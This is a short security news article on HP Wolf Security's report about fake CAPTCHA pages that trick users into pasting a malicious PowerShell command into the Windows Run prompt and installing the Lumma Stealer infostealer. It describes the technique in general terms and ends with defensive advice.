Cybercriminals are exploiting users’ trust in familiar verification tools like CAPTCHAs to trick them into infecting their own systems, according to HP Wolf Security’s latest Threat Insights Report.
The report highlights a rise in social engineering campaigns built around a fake CAPTCHA page where users are lured into completing bogus verification steps, exploiting what HP terms “click tolerance”, a habit of blindly following prompts due to frequent exposure to login and security checks.
Victims are directed to attacker-controlled websites where clicking “I’m not a robot” secretly copies a malicious PowerShell command to their clipboard. They are then instructed to open the Windows Run prompt, paste the code, and execute it, thereby unknowingly launching a malware infection themselves.
The primary payload, Lumma Stealer, is a powerful information-stealing tool capable of grabbing credentials and crypto wallets. The malware is hidden in a disguised ZIP archive and deployed using DLL sideloading to avoid detection.
HP reports that these campaigns often use reputable cloud services to host the malicious content, helping them bypass web filters and email gateways. Victims are typically drawn in via search engine hijacking, ads, or compromised websites.
To stay protected, businesses should disable clipboard sharing and restrict access to the Windows Run command where possible. Regular training can also help staff recognise and resist deceptive prompts.